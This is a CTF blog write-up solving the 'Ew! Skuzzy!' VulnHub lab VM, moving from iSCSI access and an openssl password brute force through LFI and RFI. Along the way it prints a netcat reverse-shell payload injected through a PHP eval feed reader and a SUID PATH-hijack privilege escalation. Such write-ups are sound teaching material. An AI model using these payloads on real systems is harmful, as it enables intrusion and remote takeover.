Mr_H4sh

Infosec, CTF and more

Ew! Skuzzy! Solution

In this post I’m going to show you how to solve the Ew! Skuzzy! VM provided by vortex.

You can find the VM on this link

The goal of the VM is to gain root access to the machine and capture 5 flags.

Attacker: 192.168.56.1
Victim: 192.168.56.101

I run a nmap scan to the victim, and this is what I get:

Nmap scan report for 192.168.56.101
Host is up (0.00017s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
MAC Address: 08:00:27:60:88:83 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I visit the URL http://192.168.56.101 and this is what I get:

______            _____ __                         __
/ ____/      __   / ___// /____  __________  __  __/ /
/ __/ | | /| / /   \__ \/ //_/ / / /_  /_  / / / / / / 
/ /___ | |/ |/ /   ___/ / ,< / /_/ / / /_/ /_/ /_/ /_/  
/_____/ |__/|__/   /____/_/|_|\__,_/ /___/___/\__, (_)   
                                            /____/      
Welcome to 'Ew Skuzzy!' - my first CTF VM. 
Level: Intermediate.

Forgive the name... I heard a kid say it in a shopping centre; Or, perhaps it's a hint? Or am I trolling? ¯\_(ツ)_/¯ 

You'll just have to fireup dirbuster and find out! 

Flags will be found along the way, if you're on the right path. Most flag data is not of any signifigance to the challenge.

Hints available at /dev/null, or ping me on Twitter @vortexau (UTC+9.5 timezone, I'm probably sleeping while you're awake!).

Please let me know what you think of the challenge once you're done, and submit your walkthroughs to VulnHub, I'm really looking forward to reading them!

So, the machine invites me to run dirbuster, so I start it with big.txt wordlist to find out what is hidden. This wordlist discovers the following URL http://192.168.56.101/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/, but the page returns a HTTP error 403 Forbidden.

I look at the whole URL, the word smblogin doesn’t return anything interesting, but googling smblogin custom-log arquivos url returns me a link to the wordlist common_and_portuguese.txt from the SecList wordlists collection. So I run dirb again with this wordlist and I find the URL http://192.168.56.101/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/program/font/index.html

I open the URL and I find an image of Lionel Richie that says Hello? Is it flags you're looking for. Nice, looks like he was quite young, but I have a look at the source code of the page and I find a comment:

<!--
SGVsbG8sIGlzIGl0IGZsYWdzIHlvdSdyZSBsb29raW5nIGZvcj8KSSBjYW4gc2VlIGl0IGluIHlv
dXIgZXllcwpJIGNhbiBzZWUgaXQgaW4geW91ciBzbWlsZQpGbGFncyBhcmUgYWxsIEkndmUgZXZl
ciB3YW50ZWQgYW5kIG15IHBvcnRzIGFyZSBvcGVuIHdpZGUgCkNhdXNlIHlvdSBrbm93IGp1c3Qg
d2hhdCB0byBzYXkgYW5kIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBkbwpBbmQgSSB3YW50IHRvIHRl
bGwgeW91IHNvIG11Y2gsIG5vIGZsYWdzIGZvciB5b3UuLi4K
-->

It’s encoded in Base64, so I decode it and this is what I get:

$ cat comment_lionel.txt | base64 -d
cat comment_lionel.txt | base64 -d
Hello, is it flags you're looking for?
I can see it in your eyes
I can see it in your smile
Flags are all I've ever wanted and my ports are open wide 
Cause you know just what to say and you know just what to do
And I want to tell you so much, no flags for you...

Right, this is a modified version of the song “Hello” of Lionel Richie. Looks like a troll, but he talks about ports “open wide”, and there’s a port that I’ve checked, but nothing returns: port 3260. I check what service should be running on port 3260:

$ whatportis 3260
+--------------+------+----------+-------------+
| Name         | Port | Protocol | Description |
+--------------+------+----------+-------------+
| iscsi-target | 3260 |   tcp    | iSCSI port  |
| iscsi-target | 3260 |   udp    | iSCSI port  |
+--------------+------+----------+-------------+

iSCSI Service, and looks like nmap kinda agrees:

$ nmap -sV -p 3260 -Pn -n -v 192.168.56.101

Scanning 192.168.56.101 [1 port]
Discovered open port 3260/tcp on 192.168.56.101
Completed Connect Scan at 05:11, 0.00s elapsed (1 total ports)
Initiating Service scan at 05:11
Scanning 1 service on 192.168.56.101
Completed Service scan at 05:12, 93.59s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.56.101.
Initiating NSE at 05:12
Completed NSE at 05:12, 1.36s elapsed
Nmap scan report for 192.168.56.101
Host is up (0.00024s latency).
PORT     STATE SERVICE VERSION
3260/tcp open  iscsi?

I have a look on Wikipedia about this service, and something gets my attention:

In computing, iSCSI (Listeni/aɪˈskʌzi/ eye-skuz-ee) is an acronym for Internet Small Computer Systems Interface

Did you see it? eye-skuz-ee, quite similar to the name of the VM…I might be on the right path.

So, I follow the guide on https://www.cyberciti.biz/faq/howto-setup-debian-ubuntu-linux-iscsi-initiator/ to connect to this system.

# iscsiadm --mode discovery --type sendtargets --portal 192.168.56.101
192.168.56.101:3260,1 iqn.2017-02.local.skuzzy:storage.sys0

Always following the guide, I found the record id by the discovery, and now I need to login to mount the disk on my machine:

# iscsiadm --mode node --targetname iqn.2017-02.local.skuzzy:storage.sys0 --portal 192.168.56.101:3260 --login
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.56.101,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.56.101,3260] successful.

# df -h
Filesystem      Size  Used Avail Use% Mounted on
udev            9.6G     0  9.6G   0% /dev
tmpfs           2.0G   14M  2.0G   1% /run
/dev/sda1        95G   74G   17G  82% /
tmpfs           9.6G   34M  9.6G   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           9.6G     0  9.6G   0% /sys/fs/cgroup
cgmfs           100K     0  100K   0% /run/cgmanager/fs
tmpfs           2.0G   80K  2.0G   1% /run/user/1000
/dev/sdc        976M  1.8M  907M   1% /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e

Bingo, look at /dev/sdc, mounted on /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e, there’s the flag1.txt

# ls -lah /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e
total 556K
drwxr-xr-x  3 root root 4.0K Feb 28 08:56 .
drwxr-x---+ 5 root root 4.0K Mar 22 05:23 ..
-rw-r--r--  1 root root 100M Mar  5 09:00 bobsdisk.dsk
-rw-r--r--  1 root root  143 Feb 28 08:48 flag1.txt
drwx------  2 root root  16K Feb 28 08:39 lost+found

$ cat /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/flag1.txt
Congratulations! You've discovered the first flag!

flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

Let's see how you go with the next one...

So, now there’s this file that looks like a disk, so I mount it to my computer and see the content:

# file /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/bobsdisk.dsk
/media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/bobsdisk.dsk: Linux rev 1.0 ext2 filesystem data, UUID=faef0c66-b61b-4d80-8c20-5e8da65345d4 (large files)

# mkdir mount
mkdir mount

#mount ./bobsdisk.dsk mount/
mount ./bobsdisk.dsk mount/

# ls -la mount/
total 17
drwxr-xr-x 3 root    root     1024 Mar  5 09:00 .
drwxrwxrwx 1 anthony anthony   208 Mar 22 05:31 ..
drwx------ 2 root    root    12288 Feb 28 08:56 lost+found
-rw-r--r-- 1 root    root      288 Feb 28 09:25 ToAlice.csv.enc
-rw-r--r-- 1 root    root     2342 Mar  5 09:00 ToAlice.eml

An encrypted file and a message, and the second flag:

# cat ToAlice.eml 
G'day Alice,

You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs, and it's time we took a stand!

Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!

Anyway this algorithm sounded good to me. I used the updated version that won the competition.

You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly.

Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. 

Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot) :)

Cheers,

Bob.

PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

Right, so I make some research about how to decrypt an encrypted file with openssl (check https://www.shellhacks.com/encrypt-decrypt-file-password-openssl/), and following the hints of the message I see that I need to add -md sha256 to decrypt, and the password must be in the rockyou.txt wordlist since it’s mentioned, so I come up with the following bash script:

#!/bin/bash

PASSWORDS=$(cat "./rockyou.txt")

for PASSWORD in $PASSWORDS; do
openssl enc -d -aes-256-cbc -md sha256 -in ToAlice.csv.enc -out ToAlice.csv -k $PASSWORD
RET=$?

if [ $RET -eq 0 ]; then
    echo "Candidate password: $PASSWORD"
fi
done

With this script I find a bunch of false positives. I check online and find out that the AES/CBC can only determine if “decryption works” based on getting the padding right, so basically the file decrypts but is not recovered.

This means that, based on the bunch of passwords recovered, I need to make another script to check the file, and perhaps check the content everytime the file get decrypted.

After almost a day, I got over 5000 false positives from the rockyou.txt wordlist (over 14million passwords)…what to do then? Well, gotta run again another script to check the content of the file everytime the file gets decrypted. I wrote another script to do the same thing again (I know, I could’ve done this in first place, but it didn’t pop in my mind at the time) and I log everything into different files, and then I wait until the script finishes and I’ll grep for words mentioned in the email. The script is the following:

#!/bin/bash

PASSWORDS=$(cat "./passphrases.txt")

for PASSWORD in $PASSWORDS; do
openssl enc -d -aes-256-cbc -md sha256 -in ToAlice.csv.enc -out ToAlice.csv -k $PASSWORD
RET=$?

if [ $RET -eq 0 ]; then
    cat "Found password: $PASSWORD" >> found.log
    cat ToAlice.csv > "test/$PASSWORD.log"
fi
done

And, finally (man, it was a pain), I find that the passphrase was “supercalifragilisticoespialidoso”

# grep -i "hacker" ./*
./supercalifragilisticoespialidoso.log:5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 

# cat ./supercalifragilisticoespialidoso.log
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

Finally, got third flag.

Based on the hashes of the file, I visit the URL http://192.168.56.101/5560a1468022758dba5e92ac8f2353c0 and I find a page with the following source code:

<html>
<head>
<title>Hackers! They're everywhere!</title>
</head>
<body bgcolor="black" text="#00ff00">
<center>
<marquee width="50%"><font face="arial, helvetica" size="20">HACKER DETECTED! HACKER DETECTED! HACKER DETECTED!</font></marquee>
<!-- 
Yeah, I'm bringing Marquee back, suckers!
Just not in Chrome. Thanks, Google. Firefox is still rocking the marquee tag Geocities style though! 
-->
<img src="hacker.jpg" />
</center>
</body>
</html>
<!-- 
R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
-->

I decode the Base64 hash and this is what I get:

# cat base64_hint.txt | base64 -d
cat base64_hint | base64 -d
George Costanza: [Soup Nazi gives him a look] Medium turkey chili. 
[instantly moves to the cashier] 
Jerry Seinfeld: Medium crab bisque. 
George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. 
Jerry Seinfeld: Just forget it. Let it go. 
George Costanza: Um, excuse me, I - I think you forgot my bread. 
Soup Nazi: Bread, $2 extra. 
George Costanza: $2? But everyone in front of me got free bread. 
Soup Nazi: You want bread? 
George Costanza: Yes, please. 
Soup Nazi: $3! 
George Costanza: What? 
Soup Nazi: NO FLAG FOR YOU

Another troll.

I then visit the URL http://192.168.56.101/c2444910794e037ebd8aaf257178c90b and I find a web application called “My great web app”. I visit the URL http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=flag but guess what? It’s another troll. I then visit the Feed Reader section which has a URL to load feeds: http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt. RFI doesn’t work, tried http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://192.168.56.1/simple-backdoor.php but I get the error Authentication invalid. You might need a key.. At this point I visit the URL http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/data.txt called from the Feed section, and I find the following content:

##text##
This is some example source data for my nice little feed reader. I have designed my own nice little format which will allow it to include dynamic content. Who needs consultants when it's this easy? :) 

One of the best things is this will allow me to host my feed content to display on this page on an external server! So flexible :D
##text##

##php##
print("See? This is totally dynamic, generated by PHP right in my own little tool. Hacker proof, too, because there is a secret key required!");
##php##

Ok, basically the page parses the content of the data.txt and shows it in the page, using the keyword ##php## to run PHP code.

I visit the URL http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=/etc/passwd%00 and I get the following output:

Now now.. We paid mega bucks to a big consultancy to mitigate skiddy tricks like that one! :trollface:

I instead try to visit http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=/etc/issue and I get the following output:

<header>
<h1>My great web-app!</h1>
</header>

<nav>
<ul>
<li><a href="?p=welcome">Welcome</a></li>
<li><a href="?p=flag">Flag</a></li>
<li><a href="?p=party">Let's Party!</a></li>
<li><a href="?p=reader">Feed Reader</a></li>
</ul>
</nav>

<article>

                                        __ 
_____          _____                    |  |
|   __|_ _ _   |   __|___ _ _ ___ ___ _ _|  |
|   __| | | |  |__   |  _| | |- _|- _| | |__|
|_____|_____|  |_____|___|___|___|___|_  |__|
                                    |___|   

Intentionally Vulnerable VM! Do not expose to the Internet!

Developed By - vortex
twitter: @vortexau
email: vortex@juicedigital.net 

Hints available at /dev/null (or ping me on Twitter)

Assigned IP: 192.168.56.101/24



</article>

<footer>Hack the Planet!</footer>

SWEET! Vulnerable to LFI.

I visit the URL http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=/var/www/html/c2444910794e037ebd8aaf257178c90b/flag.php, and the page renders the troll face again. I try using the php://filterfor Local File Inclusion to see the source code of the page, and this time I get the following output visiting http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=/var/www/html/c2444910794e037ebd8aaf257178c90b/flag.php:

<header>
<h1>My great web-app!</h1>
</header>

<nav>
<ul>
<li><a href="?p=welcome">Welcome</a></li>
<li><a href="?p=flag">Flag</a></li>
<li><a href="?p=party">Let's Party!</a></li>
<li><a href="?p=reader">Feed Reader</a></li>
</ul>
</nav>

<article>
PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
</article>

Which decoded in base64 is the following:

$ cat flag_php_base64.txt | base64 -d
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag! 
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
// 
// Well done, you're doing great so far!
// Next step. SHELL!
//
// 
// Oh. That flag above? You're gonna need it... 
?>

One more flag! Now I gotta get a shell.

The only page that could give me hope is /var/www/html/c2444910794e037ebd8aaf257178c90b/reader.php, so I visit the URL http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=/var/www/html/c2444910794e037ebd8aaf257178c90b/reader.php, copy the encode content in a file, decode it and this is what I find:

<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Feed Reader</h1>
<?php
if(isset($_GET['url'])) {
$url = $_GET['url'];
} else {
print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");
}

if(isset($url) && strlen($url) != '') {

// Setup some variables.
$secretok = false;
$keyneeded = true;

// Localhost as a source doesn't need to use the key.
if(preg_match("#^http://127.0.0.1#", $url)) {
    $keyneeded = false;
    $secretok = true;
}

// Handle the key validation when it's needed.
if($keyneeded) {
    $key = $_GET['key'];
    if(is_array($key)) {
        die("Array trick is mitigated ;)");
    }
    if(isset($key) && strlen($key) == '47') {
    $hashedkey = hash('sha256', $key);
        $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

        // If you can use the following code for a timing attack
        // then good luck :) But.. You have the source anyway, right? :) 
    if(strcmp($hashedkey, $secret) == 0) {
            $secretok = true;
        } else {
            die("Sorry... Authentication failed. Key was invalid.");
    }

    } else {
        die("Authentication invalid. You might need a key.");
    }
}

// Just to make sure the above key check was passed.
if(!$secretok) {
    die("Something went wrong with the authentication process");
}

// Now load the contents of the file we are reading, and parse
// the super awesomeness of its contents!
$f = file_get_contents($url);

$text = preg_split("/##text##/s", $f);

if(isset($text['1']) && strlen($text['1']) > 0) {
    print($text['1']);
}

print "<br /><br />";

$php = preg_split("/##php##/s", $f);

if(isset($php['1']) && strlen($php['1']) > 0) { 
    eval($php['1']);
    // "If Eval is the answer, you're asking the wrong question!" - SG
    // It hurts me to write insecure code like this, but it is in the
    // name of education, and FUN, so I'll let it slide this time.
}
}

So, we need to find a key to put in the key parameter in querystring for the reader.php in order to do a RFI.

After I while and various attempts, I understant that the key is flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b} based on the message got from the flag.php file.

I setup the following data.txt reachable from http://192.168.56.1/data.txt with the following content:

Ok, all set, I visit the URL http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://192.168.56.1/data.txt&key=flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b} multiple times in order to check which are the disabled PHP functions, create a data.txt with a reverse shell command and eventually get a reverse shell. There are no functions disabled that could deny me to run shell commands, so I do the following:

# cat data.txt 
##php##
phpinfo();
##php##
# php -S 0.0.0.0:80
PHP 7.0.15-0ubuntu0.16.04.2 Development Server started at Wed Mar 22 14:47:16 2017
Listening on http://0.0.0.0:80
Document root is /ew_skuzzy
Press Ctrl-C to quit.
[Wed Mar 22 14:49:46 2017] 192.168.56.101:49544 [200]: /data.txt
^C
# vim data.txt
# cat data.txt 
##php##
shell_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4444 >/tmp/f');
##php##
# php -S 0.0.0.0:80
PHP 7.0.15-0ubuntu0.16.04.2 Development Server started at Wed Mar 22 19:15:02 2017
Listening on http://0.0.0.0:80
Document root is /media/anthony/Anthony PT External/ctf/ew_skuzzy
Press Ctrl-C to quit.
[Wed Mar 22 14:51:11 2017] 192.168.56.101:49560 [200]: /data.txt

And on the other terminal I get a reverse shell:

# nc -lnvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.56.101] port 4444 [tcp/*] accepted (family 2, sport 41612)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ hostname
skuzzy
$ /sbin/ifconfig
enp0s3    Link encap:Ethernet  HWaddr 08:00:27:60:88:83  
        inet addr:192.168.56.101  Bcast:192.168.56.255  Mask:255.255.255.0
        inet6 addr: fe80::a00:27ff:fe60:8883/64 Scope:Link
        UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
        RX packets:832540 errors:179 dropped:0 overruns:0 frame:0
        TX packets:807697 errors:0 dropped:0 overruns:0 carrier:0
        collisions:0 txqueuelen:1000 
        RX bytes:174883630 (174.8 MB)  TX bytes:508605160 (508.6 MB)
        Interrupt:19 Base address:0xd020 

lo        Link encap:Local Loopback  
        inet addr:127.0.0.1  Mask:255.0.0.0
        inet6 addr: ::1/128 Scope:Host
        UP LOOPBACK RUNNING  MTU:65536  Metric:1
        RX packets:278812 errors:0 dropped:0 overruns:0 frame:0
        TX packets:278812 errors:0 dropped:0 overruns:0 carrier:0
        collisions:0 txqueuelen:1 
        RX bytes:20637869 (20.6 MB)  TX bytes:20637869 (20.6 MB)

Perfect, I’m in.

I check the /etc/passwd file, and this is what I find:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
skuzzy:x:1000:1000:skuzzy skuzbucket,,,:/home/skuzzy:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin

I wander around, and I find a bunch of files with the SUID set, in particular the file /opt/alicebackup:

www-data@skuzzy:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/sudo
/bin/fusermount
/bin/mount
/bin/su
/bin/ntfs-3g
/bin/ping
/bin/ping6
/bin/umount
/opt/alicebackup

I run the file, and I see that the function id is run, and then a ssh connection is attempted:

www-data@skuzzy:/tmp$ cd /op	
cd /opt/
www-data@skuzzy:/opt$ ls -la
ls -la
total 20
drwxr-xr-x  2 root root 4096 Mar  2 22:56 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rwsr-xr-x  1 root root 8736 Mar  2 22:56 alicebackup
www-data@skuzzy:/opt$ ./alicebackup
./alicebackup
uid=0(root) gid=0(root) groups=0(root),33(www-data)
ssh: Could not resolve hostname alice.home: Temporary failure in name resolution
lost connection

At this point I copy a version of /bin/sh into the /tmp folder, export the /tmp folder into the Environment Path of Linux and run /opt/alicebackup, in order to execute a shell as root:

www-data@skuzzy:/opt$ cd /tmp
cd /tmp
www-data@skuzzy:/opt$ clear
clear
TERM environment variable not set.
www-data@skuzzy:/opt$ export TERM=linux
export TERM=linux
www-data@skuzzy:/opt$ ls -la
ls -la
total 20
drwxr-xr-x  2 root root 4096 Mar  2 22:56 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rwsr-xr-x  1 root root 8736 Mar  2 22:56 alicebackup
www-data@skuzzy:/opt$ cd /tmp
cd /tmp
www-data@skuzzy:/tmp$ cp /bin/sh id
cp /bin/sh id
www-data@skuzzy:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@skuzzy:/tmp$ which id
which id
/tmp/id
www-data@skuzzy:/tmp$ /opt/alicebackup
/opt/alicebackup
# whoami
whoami
root
# /usr/bin/id
/usr/bin/id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls -la
ls -la
total 24
drwx------  3 root root 4096 Mar  2 22:36 .
drwxr-xr-x 23 root root 4096 Feb 28 06:51 ..
-rw-r--r--  1 root root 3106 Oct 23  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
drwx------  2 root root 4096 Mar  2 22:36 .ssh
-rw-r--r--  1 root root  493 Mar  2 22:04 flag.txt
# cat flag.txt
cat flag.txt
Congratulations!

flag5{42273509a79da5bf49f9d40a10c512dd96d89f6a}

You've found the final flag and pwned this CTF VM!

I really hope this was an enjoyable challenge, and that my trolling and messing with you didn't upset you too much! I had a blast making this VM, so it won't be my last!

I'd love to hear your thoughts on this one.
Too easy?
Too hard?
Too much stuff to install to get the iSCSI initiator working?

Drop me a line on twitter @vortexau, or via email vortex@juicedigital.net

Got root and the last flag!

Learnt some new things in here, especially the fact that I have patience bruteforcing sometimes :) the iSCSI (or eye-skuz-ee). I’ve also enjoyed the trolls of the author, very nice!

Thank you to vortex for the VM and Vulnhub for hosting it.